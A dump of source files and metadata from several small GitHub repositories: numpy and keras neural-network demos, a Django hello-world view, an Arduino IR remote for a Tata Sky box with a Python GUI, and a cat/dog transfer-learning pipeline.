plot_name, file_name=None, XX=None, YY=None, preds=None, dark=False):\r\n if (dark):\r\n plt.style.use('dark_background')\r\n else:\r\n sns.set_style(\"whitegrid\")\r\n plt.figure(figsize=(16,12))\r\n axes = plt.gca()\r\n axes.set(xlabel=\"$X_1$\", ylabel=\"$X_2$\")\r\n plt.title(plot_name, fontsize=30)\r\n plt.subplots_adjust(left=0.20)\r\n plt.subplots_adjust(right=0.80)\r\n if(XX is not None and YY is not None and preds is not None):\r\n plt.contourf(XX, YY, preds.reshape(XX.shape), 25, alpha = 1, cmap=cm.Spectral)\r\n plt.contour(XX, YY, preds.reshape(XX.shape), levels=[.5], cmap=\"Greys\", vmin=0, vmax=.6)\r\n plt.scatter(X[:, 0], X[:, 1], c=y.ravel(), s=40, cmap=plt.cm.Spectral, edgecolors='black')\r\n if(file_name):\r\n plt.savefig(file_name)\r\n plt.close()\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 6, \"activation\": \"relu\"},\r\n {\"input_dim\": 6, \"output_dim\": 6, \"activation\": \"relu\"},\r\n {\"input_dim\": 6, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 4, \"activation\": \"relu\"},\r\n {\"input_dim\": 4, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nnn_architecture = [\r\n {\"input_dim\": 2, \"output_dim\": 25, \"activation\": \"relu\"},\r\n {\"input_dim\": 25, \"output_dim\": 50, \"activation\": \"relu\"},\r\n {\"input_dim\": 50, \"output_dim\": 50, \"activation\": \"relu\"},\r\n {\"input_dim\": 50, \"output_dim\": 25, \"activation\": \"relu\"},\r\n {\"input_dim\": 25, \"output_dim\": 1, \"activation\": \"sigmoid\"},\r\n]\r\n\r\nN_SAMPLES = 1000\r\n# ratio between training and test sets\r\nTEST_SIZE = 0.1\r\n\r\nX, y = make_moons(n_samples = N_SAMPLES, noise=0.2, random_state=100)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=42)\r\n\r\n\r\nmake_plot(X, y, 'Data')\r\n#X, Y, nn_architecture, epochs, learning_rate, seed = np.transpose(X_train), np.transpose(y_train.reshape((y_train.shape[0], 1))), nn_architecture, 100, 0.001, 1964\r\n\r\nparams, history = train(np.transpose(X_train), np.transpose(y_train.reshape((y_train.shape[0], 1))), nn_architecture, 100, 0.0001, 1964)\r\n\r\nplt.figure()\r\nplt.plot(history['loss'])\r\nplt.title('loss')\r\nplt.yscale('log')\r\nplt.show()\r\n\r\nplt.figure()\r\nplt.plot(history['accuracy'])\r\nplt.title('accuracy')\r\nplt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.7655502557754517,
"alphanum_fraction": 0.8086124658584595,
"avg_line_length": 68.66666412353516,
"blob_id": "ef70962243bf8230f6115e0e28f5f789e7b18d00",
"content_id": "8f4a21a181db3aaea498966ffd84f854ba49d716",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 209,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 3,
"path": "/README.md",
"repo_name": "AngusNicolson/numpy_neural_net",
"src_encoding": "UTF-8",
"text": "# numpy_neural_net\nNeural net for binary classification using numpy. Credit to Piotr Skalski's Medium post for help writing this.\nhttps://towardsdatascience.com/lets-code-a-neural-network-in-plain-numpy-ae7e74410795\n"
},
{
"alpha_fraction": 0.6214510798454285,
"alphanum_fraction": 0.6489409804344177,
"avg_line_length": 26.792207717895508,
"blob_id": "91a73e25cf6735ed89b8aa36245d4bbc6caa8ea0",
"content_id": "cef77ad198ef1ee56da9f10fc260ae04a9b3dc93",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2219,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 77,
"path": "/keras_neural_net.py",
"repo_name": "AngusNicolson/numpy_neural_net",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 12 19:28:30 2019\r\n\r\n@author: angus\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n#from mpl_toolkits.mplot3d import Axes3D\r\nsns.set_style(\"whitegrid\")\r\n\r\n\r\ndef make_plot(X, y, plot_name, file_name=None, XX=None, YY=None, preds=None, dark=False):\r\n if (dark):\r\n plt.style.use('dark_background')\r\n else:\r\n sns.set_style(\"whitegrid\")\r\n plt.figure(figsize=(16,12))\r\n axes = plt.gca()\r\n axes.set(xlabel=\"$X_1$\", ylabel=\"$X_2$\")\r\n plt.title(plot_name, fontsize=30)\r\n plt.subplots_adjust(left=0.20)\r\n plt.subplots_adjust(right=0.80)\r\n if(XX is not None and YY is not None and preds is not None):\r\n plt.contourf(XX, YY, preds.reshape(XX.shape), 25, alpha = 1, cmap=cm.Spectral)\r\n plt.contour(XX, YY, preds.reshape(XX.shape), levels=[.5], cmap=\"Greys\", vmin=0, vmax=.6)\r\n plt.scatter(X[:, 0], X[:, 1], c=y.ravel(), s=40, cmap=plt.cm.Spectral, edgecolors='black')\r\n if(file_name):\r\n plt.savefig(file_name)\r\n plt.close()\r\n\r\nN_SAMPLES = 1000\r\n# ratio between training and test sets\r\nTEST_SIZE = 0.1\r\n\r\nX, y = make_moons(n_samples = N_SAMPLES, noise=0.2, random_state=100)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=42)\r\n\r\n\r\nmake_plot(X, y, 'Data')\r\n\r\n\r\nmodel = Sequential()\r\n\r\nmodel.add(Dense(units=4, activation='relu', input_dim=2))\r\nmodel.add(Dense(units=6, activation='relu'))\r\n#model.add(Dense(units=6, activation='relu'))\r\n#model.add(Dense(units=4, activation='relu'))\r\nmodel.add(Dense(units=1, activation='sigmoid'))\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(x=X_train, y=y_train, epochs=200)\r\n\r\nmodel.evaluate(x=X_test, y=y_test)\r\n\r\nplt.figure()\r\nplt.plot(model.history.history['acc'])\r\nplt.title('accuracy')\r\nplt.show()\r\n\r\nplt.figure()\r\nplt.plot(model.history.history['loss'])\r\nplt.title('loss')\r\nplt.yscale('log')\r\nplt.show()\r\n\r\n"
}
] | 3 |
jinchuuriki91/instagramproject
|
https://github.com/jinchuuriki91/instagramproject
|
a17dbdc242b01b782cb8031126647d54bc96d9e8
|
86f7206f3064142c8bc338944d66866e8898e4d4
|
853b50f3b8c66522ce8d5028d8642facb6d8ca96
|
refs/heads/master
| 2020-05-29T15:12:40.693927 | 2016-07-28T23:08:31 | 2016-07-28T23:08:31 | 64,425,584 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4333333373069763,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 14,
"blob_id": "02fcd2b8ad2d71c67d82eaba29693e9dc984eda5",
"content_id": "a881fffef1f4d04b38a064eef7131f22988908fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 2,
"path": "/requirement.txt",
"repo_name": "jinchuuriki91/instagramproject",
"src_encoding": "UTF-8",
"text": "Django==1.9.8\npsycopg2==2.4.5\n"
},
{
"alpha_fraction": 0.7435897588729858,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 22.399999618530273,
"blob_id": "9f1f107ee2dabe362d72750c75df243aff84b10b",
"content_id": "e285d51b7151ca6879eff93b981f3dce3b0a20c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 5,
"path": "/django_project/views.py",
"repo_name": "jinchuuriki91/instagramproject",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. Ok now fuck off.\")\n"
}
] | 2 |
MakGulati/tata-sky-remote
|
https://github.com/MakGulati/tata-sky-remote
|
6e31920015a8aac5e5e07e221fbf6cb3c617b0fc
|
146e08d8d7d8333bfa67274bb3c9aa92e87d927c
|
184908552ff00beb578854da59c537ab53caf1af
|
refs/heads/master
| 2021-04-28T15:07:03.060952 | 2018-02-18T19:35:34 | 2018-02-18T19:35:34 | 121,982,707 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7961956262588501,
"alphanum_fraction": 0.7989130616188049,
"avg_line_length": 32.45454406738281,
"blob_id": "5a81ab5ebaae598f80bb41281c9a3b66c61a79bc",
"content_id": "49563df785f39677f558002b0c28cef3ea07a88d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 11,
"path": "/README.md",
"repo_name": "MakGulati/tata-sky-remote",
"src_encoding": "UTF-8",
"text": "# tata-sky-remote\ntata sky remote using arduino with GUI in python\n\nDecoding IR hex code using Arduino IR library with help of IRrecvDumpV2.ino\nthen writing code with help of IRsendRawDemo.ino as it was not standard remote like Sony,NEC etc.\n\nThen transmitting that values through IR transmitter.\nTo make better GUI I used tkinter module of python.\n\nCheers :)\n-Mayank\n"
},
{
"alpha_fraction": 0.25372257828712463,
"alphanum_fraction": 0.6389106512069702,
"avg_line_length": 51.06122589111328,
"blob_id": "393cf3883eb1b4ad06148f76f24753888479e87e",
"content_id": "256be6d23ce7051471df689506e91010aee5cf8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5104,
"license_type": "no_license",
"max_line_length": 449,
"num_lines": 98,
"path": "/IRsendRawDemo_mod.ino",
"repo_name": "MakGulati/tata-sky-remote",
"src_encoding": "UTF-8",
"text": "\n\n#include <IRremote.h>\n\nIRsend irsend;\nchar data;\nvoid setup()\n{\nSerial.begin(9600);\nSerial.println(\"your response: \");\n}\n\nvoid loop() {\n int khz = 38; // 38kHz carrier frequency of 1838\n //unsigned int irSignal[] = {9000, 4500, 560, 560, 560, 560, 560, 1690, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 1690, 560, 1690, 560, 560, 560, 1690, 560, 1690, 560, 1690, 560, 1690, 560, 1690, 560, 560, 560, 560, 560, 560, 560, 1690, 560, 560, 560, 560, 560, 560, 560, 560, 560, 1690, 560, 1690, 560, 1690, 560, 560, 560, 1690, 560, 1690, 560, 1690, 560, 1690, 560, 39416, 9000, 2210, 560}; //AnalysIR Batch Export (IRremote) - RAW\nunsigned int rawData[49] = {2600,950, 400,450, 400,500, 400,900, 400,900, 900,450, 400,450, 400,500, 400,450, 450,450, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 400,450, 400,500, 400,450, 400,500, 800,450, 450,900, 400,500, 500}; // UNKNOWN 499B750A\nunsigned int rawData1[47] = {2550,950, 400,450, 400,500, 400,900, 400,900, 850,450, 400,500, 400,500, 350,500, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 850,450, 400,900, 850}; // UNKNOWN A2B4FD50//mute\nunsigned int rawData2[47] = {2600,900, 400,500, 400,450, 450,900, 400,900, 850,450, 400,500, 400,450, 400,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 850,450, 450,900, 400,450, 850,450, 450,900, 400,450, 400}; // UNKNOWN B5509A8//guide\nunsigned int rawData3[49] = {2550,950, 400,450, 400,500, 400,900, 400,950, 800,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 400,500, 350,500, 850,900, 400,500, 350,500, 400,500, 400}; // UNKNOWN C31D712E//vol+\nunsigned int rawData4[47] = {2600,950, 400,450, 400,500, 400,900, 400,900, 850,450, 450,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,450, 450,450, 450,450, 400,450, 450,450, 400,450, 400,500, 850,900, 400,450, 400,500, 850}; // UNKNOWN 49F4E73F//vol-\nunsigned int rawData6[47] = {2550,950, 400,500, 400,450, 400,950, 350,950, 850,450, 400,500, 400,450, 400,450, 450,450, 400,500, 400,450, 400,500, 400,450, 400,450, 450,450, 400,500, 850,900, 400,450, 400,500, 400,500, 350,500, 850,450, 400}; // UNKNOWN 798DECFE //back\n//unsigned int rawData7[45] = {2550,950, 400,500, 400,450, 450,850, 400,950, 800,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 400,500, 400,450, 400,500, 450,400, 400,500, 400,450, 850,900, 850,500, 350,950, 800,950, 400}; // UNKNOWN CF7095CD //left\n//unsigned int rawData8[45] = {2550,950, 400,500, 350,500, 400,900, 400,950, 800,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 850,900, 850,450, 400,950, 800,500, 400}; // UNKNOWN CE70943A //right\n//unsigned int rawData9[47] = {2550,950, 400,500, 400,450, 400,950, 400,900, 850,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 800,950, 800,500, 400,900, 400,450, 400,500, 400}; // UNKNOWN A215B7E2 //up\n//unsigned int rawData10[45] = {2550,950, 400,450, 400,500, 400,900, 400,950, 800,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 350,500, 850,900, 850,450, 400,950, 350,500, 850}; // UNKNOWN A86E19D3 //down\n//unsigned int rawData11[47] = {2550,950, 400,500, 400,450, 400,950, 350,950, 850,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 850,900, 850,500, 400,450, 400,900, 400,500, 400}; // UNKNOWN 9E856ADE //select\n//\n\n\nwhile (Serial.available())\n{\n data = Serial.read();\n switch(data)\n{case '5':\n { irsend.sendRaw(rawData, sizeof(rawData) / sizeof(rawData[0]), khz); //power\n delay(40);\n }\n\n\ncase '1':\n { irsend.sendRaw(rawData1, sizeof(rawData1) / sizeof(rawData1[0]), khz); //mute\n delay(40);\n break;\n }\n \ncase '2':\n { irsend.sendRaw(rawData2, sizeof(rawData2) / sizeof(rawData2[0]), khz); //guide\n delay(40);\n break;\n }\n \n\n case '3':\n { irsend.sendRaw(rawData3, sizeof(rawData3) / sizeof(rawData3[0]), khz); //vol+\n delay(40);\n break;\n }\n\n\n case '4':\n { irsend.sendRaw(rawData4, sizeof(rawData4) / sizeof(rawData4[0]), khz); //vol-\n delay(40);\n break;\n }\n\ncase '6':\n { irsend.sendRaw(rawData6, sizeof(rawData6) / sizeof(rawData6[0]), khz); //back\n delay(40);\n break;\n }\n//case '7':\n// { irsend.sendRaw(rawData7, sizeof(rawData7) / sizeof(rawData7[0]), khz); //left\n// delay(40);\n// break;\n// } \n//case '8':\n// { irsend.sendRaw(rawData8, sizeof(rawData8) / sizeof(rawData8[0]), khz); //right\n// delay(40);\n// break;\n// } \n//case '9':\n// { irsend.sendRaw(rawData9, sizeof(rawData9) / sizeof(rawData9[0]), khz); //up\n// delay(40);\n// break;\n// } \n//case 'a':\n// { irsend.sendRaw(rawData10, sizeof(rawData10) / sizeof(rawData10[0]), khz); //down\n// delay(40);\n// break;\n// } \n//case 'b':\n// { irsend.sendRaw(rawData11, sizeof(rawData11) / sizeof(rawData11[0]), khz); //select\n// delay(40);\n// break;\n// } \n \n}\n \n}\n}\n"
},
{
"alpha_fraction": 0.5752038955688477,
"alphanum_fraction": 0.6006525158882141,
"avg_line_length": 35.78313064575195,
"blob_id": "46f98569ca8b35c67760a213fefa2ad69366a6dc",
"content_id": "f16380e99bba46a4584456ae6f36b4daecf799b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3065,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 83,
"path": "/serial_check_tk.py",
"repo_name": "MakGulati/tata-sky-remote",
"src_encoding": "UTF-8",
"text": "import serial\nimport time\nimport tkinter as tk \nArduinoSerial=serial.Serial('/dev/cu.usbmodem14311',9600)\ntime.sleep(2)\ndef close_window (): \n root.destroy()\n root.mainloop()\n import sys\n sys.exit(\"exiting\")\ndef sel():\n selection = \"You selected the option \" + str(var.get())\n label.config(text = selection)\n v = str(var.get())\n if (v == '5'): #if the value is 5\n ArduinoSerial.write('5'.encode()) #send 5\n print (\"Power\")\n time.sleep(1)\n \n if (v == '1'): #if the value is 1\n ArduinoSerial.write('1'.encode()) #send 1\n print (\"Mute\")\n time.sleep(1)\n if (v == '2'): #if the value is 2\n ArduinoSerial.write('2'.encode()) #send 2\n print (\"Guide\")\n time.sleep(1)\n if (v == '3'): #if the value is 3\n ArduinoSerial.write('3'.encode()) #send 3\n print (\"Vol+\")\n time.sleep(1)\n\n if (v == '4'): #if the value is 4\n ArduinoSerial.write('4'.encode()) #send 4\n print (\"Vol-\")\n time.sleep(1)\n \n if (v == '6'): #if the value is 6\n ArduinoSerial.write('6'.encode()) #send 6\n print (\"back\")\n time.sleep(1)\n if (v == '7'): #if the value is 7\n ArduinoSerial.write('7'.encode()) #send 7\n print (\"left\")\n time.sleep(1)\n if (v == '8'): #if the value is 8\n ArduinoSerial.write('8'.encode()) #send 8\n print (\"right\")\n time.sleep(1)\n if (v == '9'): #if the value is 9\n ArduinoSerial.write('9'.encode()) #send 9\n print (\"up\")\n time.sleep(1)\n if (v == '10'): #if the value is 10\n ArduinoSerial.write('a'.encode()) #send a\n print (\"down\")\n time.sleep(1)\n if (v == '11'): #if the value is 11\n ArduinoSerial.write('b'.encode()) #send b\n print (\"Select\")\n time.sleep(1) \n\nroot = tk.Tk()\nroot.title('Tata Sky')\nframe=tk.Frame(root)\nframe.pack()\nvar = tk.IntVar()\n\ntk.Radiobutton(root, text=\"Power\", variable=var, value=5, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Mute\", variable=var, value=1, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Guide\", variable=var, value=2, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Vol+\", variable=var, value=3, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Vol- \", variable=var, value=4, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"back\", variable=var, value=6, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"left\", variable=var, value=7, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"right\", variable=var, value=8, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"up\", variable=var, value=9, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"down\", variable=var, value=10, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Select\", variable=var, value=11, command=sel).pack(anchor=tk.W)\nbutton = tk.Button (frame, text = \"Good-bye.\", command = close_window).pack(anchor=tk.W)\nlabel = tk.Label(root)\nlabel.pack()\nroot.mainloop()\n\n\n\n\n\n\n \n"
}
] | 3 |
DufanD/preprocessing-tiroid
|
https://github.com/DufanD/preprocessing-tiroid
|
36ae01217c7a3a5032f4dc5a18a4b4bf94888c7f
|
2d5a95a61da48ee2b600416b87acd4dac3faef0e
|
cd35ba94618d636fe4d1a6e6ad7c4e091c4cc924
|
refs/heads/master
| 2020-06-02T19:21:12.347898 | 2019-05-02T12:42:37 | 2019-05-02T12:42:37 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5779256820678711,
"alphanum_fraction": 0.5890182852745056,
"avg_line_length": 28.080644607543945,
"blob_id": "8fd85bc0cc894934bf9ba21e8755c352cf5af54c",
"content_id": "99680f38819785285027ea0c56f5e7c8538724bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3606,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 124,
"path": "/main.py",
"repo_name": "DufanD/preprocessing-tiroid",
"src_encoding": "UTF-8",
"text": "#%%all\nimport csv\nimport numpy as np\nimport impyute as imp\nfrom scipy import stats\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import LeaveOneOut\n\ndef count_error(X_train, X_test, y_train, y_test):\n knn.fit(X_train, y_train)\n prediksi = knn.predict(X_test)\n if prediksi != y_test:\n return True\n\n return False\n\n#%%set_missing\ndef setMissingValues(data):\n data = pd.DataFrame({\n 'a': data[:, 0],\n 'b': data[:, 1],\n 'c': data[:, 2],\n 'd': data[:, 3],\n 'e': data[:, 4],\n 'label': data[:, 5]\n })\n\n data_missing_grouped = data.groupby('label')\n\n new_data_grouped = list()\n for key, item in data_missing_grouped:\n temp = list(imp.fast_knn(np.array(item), k=3))\n for i in temp:\n new_data_grouped.append(i)\n\n with open('data/new_tiroid.csv', 'w') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerows(new_data_grouped)\n csvFile.close()\n\n return new_data_grouped\n\n#%%set_min_max\ndef setMinMaxNormalization(data):\n minmax_scaler = MinMaxScaler()\n\n X = np.array(data)[:, :5]\n y = np.array(data)[:, 5]\n\n loo = LeaveOneOut()\n\n error = 0\n for train_index, test_index in loo.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n X_train = list(minmax_scaler.fit_transform(X_train))\n X_test = minmax_scaler.transform(X_test)\n if (count_error(X_train, X_test, y_train, y_test)):\n error += 1\n\n print('Error Min-Max : ', (error / len(data)) * 100, '%')\n\n#%%set_zscore\ndef setZscoreNormalization(data):\n X = np.array(data)[:, :5]\n y = np.array(data)[:, 5]\n\n loo = LeaveOneOut()\n\n error = 0\n for train_index, test_index in loo.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n for i in range(0, len(X_train[0])):\n X_test[0, i] = (X_test[0, i] - stats.tmean(\n X_train[:, i])) / stats.tstd(X_train[:, i])\n X_train = list(stats.zscore(X_train))\n if (count_error(X_train, X_test, y_train, y_test)):\n error += 1\n\n print('Error Z-Score : ', (error / len(data)) * 100, '%')\n\n#%%set_sigmoid\ndef sigmoid(x):\n import math\n return (1 - math.exp(-x)) / (1 + math.exp(-x))\n\n#%%set_sigmoid_normalization\ndef setSigmoidNormalization(data):\n X = np.array(data)[:, :5]\n y = np.array(data)[:, 5]\n\n loo = LeaveOneOut()\n\n error = 0\n for train_index, test_index in loo.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n for i in range(0, len(X_train[0])):\n X_test[0, i] = sigmoid(\n (X_test[0, i] - stats.tmean(X_train[:, i])) /\n stats.tstd(X_train[:, i]))\n X_train = [\n [sigmoid(itemj) for itemj in item] for item in stats.zscore(X_train)\n ]\n\n if (count_error(X_train, X_test, y_train, y_test)):\n error += 1\n\n print('Error Sigmoid : ', (error / len(data)) * 100, '%')\n\nknn = KNeighborsClassifier(n_neighbors=3)\ndata_arrays = pd.read_csv('data/data_tiroid_missing.csv')\ndata_arrays = data_arrays.replace('?', np.nan)\ndata_arrays = np.array(data_arrays, dtype=float)\n\ndata_label = np.array(data_arrays)[:, 5].tolist()\n\nnew_data = setMissingValues(data_arrays)\nsetMinMaxNormalization(new_data)\nsetZscoreNormalization(new_data)\nsetSigmoidNormalization(new_data)\n"
}
] | 1 |
CYYukio/cat-dog
|
https://github.com/CYYukio/cat-dog
|
bbeeb243e703e5d6254044930cd618b2506ce2be
|
7a76d01eb6873dda72208ae0d0c08a39debd4267
|
18a511530d465a80cae148c03412b7a32c632b54
|
refs/heads/main
| 2023-02-28T06:20:28.081439 | 2021-02-07T14:35:26 | 2021-02-07T14:35:26 | 334,677,512 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6226328015327454,
"alphanum_fraction": 0.6475750803947449,
"avg_line_length": 28.43661880493164,
"blob_id": "e178b9e44ac31d781a2751152ec4722b07958eeb",
"content_id": "5dc9707313b336e0cbdc00fe3f4fac794a691400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2173,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 71,
"path": "/train.py",
"repo_name": "CYYukio/cat-dog",
"src_encoding": "UTF-8",
"text": "import h5py\r\nimport numpy as np\r\nfrom sklearn.utils import shuffle\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nimport pandas as pd\r\nfrom keras.preprocessing.image import *\r\nimport matplotlib.pylab as plt\r\nnp.random.seed(2017)\r\n\r\nBATCH_SIZE=128\r\nEPOCHS=40\r\n\r\n\r\nX_train = []\r\nX_test = []\r\n\r\nfor filename in [\"pre_ResNet50.h5\", \"pre_VGG19.h5\", \"pre_InceptionV3.h5\"]:\r\n with h5py.File(filename, 'r') as h:\r\n X_train.append(np.array(h['train']))\r\n X_test.append(np.array(h['test']))\r\n y_train = np.array(h['label'])\r\n\r\nX_train = np.concatenate(X_train, axis=1)\r\nX_test = np.concatenate(X_test, axis=1)\r\n\r\nX_train, y_train = shuffle(X_train, y_train)\r\n\r\n\r\ninput_tensor = Input(X_train.shape[1:])\r\nx = Dropout(0.5)(input_tensor)\r\nx = Dense(1, activation='sigmoid')(x)\r\nmodel = Model(input_tensor, x)\r\n\r\nmodel.compile(optimizer='adadelta',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n_history=model.fit(X_train, y_train, batch_size=BATCH_SIZE, epochs=EPOCHS, validation_split=0.2)\r\nmodel.save(\"./model.h5\")#保存模型\r\n\r\ny_pred = model.predict(X_test, verbose=1)\r\ny_pred = y_pred.clip(min=0.005, max=0.995)\r\n\r\ndf = pd.read_csv(\"sample_submission.csv\",header=None, delim_whitespace=True, engine='python')\r\n\r\ngen = ImageDataGenerator()\r\ntest_generator = gen.flow_from_directory(\"test2\", (224, 224), shuffle=False,\r\n batch_size=16, class_mode=None)\r\n\r\nfor i, fname in enumerate(test_generator.filenames):\r\n index = int(fname[fname.rfind('/')+1:fname.rfind('.')])\r\n df.set_value(index-1, 'label', y_pred[i])\r\n\r\ndf.to_csv('pred.csv', index=None)\r\ndf.head(10)\r\n\r\n\r\nplt.style.use(\"ggplot\")\r\nplt.figure()\r\nN= EPOCHS\r\nplt.plot(np.arange(0, N), _history.history[\"loss\"], label=\"train_loss\")\r\nplt.plot(np.arange(0, N), _history.history[\"val_loss\"], label=\"val_loss\")\r\nplt.plot(np.arange(0, N), _history.history[\"accuracy\"], label=\"train_acc\")\r\nplt.plot(np.arange(0, N), _history.history[\"val_accuracy\"], label=\"val_acc\")\r\nplt.title(\"loss and accuracy\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"loss/acc\")\r\nplt.legend(loc=\"best\")\r\nplt.savefig(\"./result.png\")\r\nplt.show()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6705882549285889,
"alphanum_fraction": 0.6985294222831726,
"avg_line_length": 35.77777862548828,
"blob_id": "cb153ada29df5827a9a75d322825e926dbb70b54",
"content_id": "6f58e419daace5b82bae886d6ef2afbb686950be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 36,
"path": "/savemodel.py",
"repo_name": "CYYukio/cat-dog",
"src_encoding": "UTF-8",
"text": "##准备用预训练过的大型网络\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.applications import *\r\nfrom keras.preprocessing.image import *\r\nfrom keras.applications.inception_v3 import InceptionV3, preprocess_input\r\nimport h5py\r\n\r\ndef save_model(MODEL,image_size,lambda_func=None):\r\n width = image_size[0]\r\n height = image_size[1]\r\n input_tensor = Input((width, height, 3))\r\n x = input_tensor\r\n\r\n if lambda_func:\r\n x=Lambda(lambda_func)(x)\r\n\r\n base_model=MODEL(input_tensor=x,weights='imagenet',include_top=False)\r\n model=Model(base_model.input, GlobalAveragePooling2D()(base_model.output))\r\n\r\n gen=ImageDataGenerator()\r\n train_generator = gen.flow_from_directory(\"train2\", image_size, shuffle=False, batch_size=16)\r\n test_generator = gen.flow_from_directory(\"test2\", image_size, shuffle=False, batch_size=16, class_mode=None)\r\n\r\n train=model.predict(train_generator,train_generator.samples)\r\n test=model.predict(test_generator,test_generator.samples)\r\n\r\n with h5py.File(\"pre_%s.h5\" % MODEL.__name__) as h:\r\n h.create_dataset(\"train\", data=train)\r\n h.create_dataset(\"test\", data=test)\r\n h.create_dataset(\"label\", data=train_generator.classes)\r\n\r\n\r\n#save_model(ResNet50, (224, 224))\r\nsave_model(InceptionV3, (299, 299), preprocess_input)\r\nsave_model(VGG19, (299, 299), preprocess_input)\r\n"
},
{
"alpha_fraction": 0.6821191906929016,
"alphanum_fraction": 0.807947039604187,
"avg_line_length": 12.727272987365723,
"blob_id": "dbe97ac6ca01012c9acd5c8477d9cb68408a3978",
